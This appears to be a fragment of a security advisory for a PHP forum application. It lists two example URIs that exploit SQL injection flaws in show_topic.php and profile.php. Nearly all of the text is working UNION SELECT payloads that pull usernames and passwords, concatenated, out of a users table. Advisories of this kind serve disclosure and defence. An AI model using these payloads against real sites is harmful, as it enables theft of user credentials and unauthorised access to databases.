| Code |
Attackers can use a browser to exploit these issues.The following example URIs are available:http://www.example.com/show_topic.php?id=-1+UNION+SELECT+1,2,3,4,concat(username,0x3a,password),6,7+FROM+users/*http://www.example.com/profile.php?user='-1+UNION+SELECT+1,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11+FROM+users/* |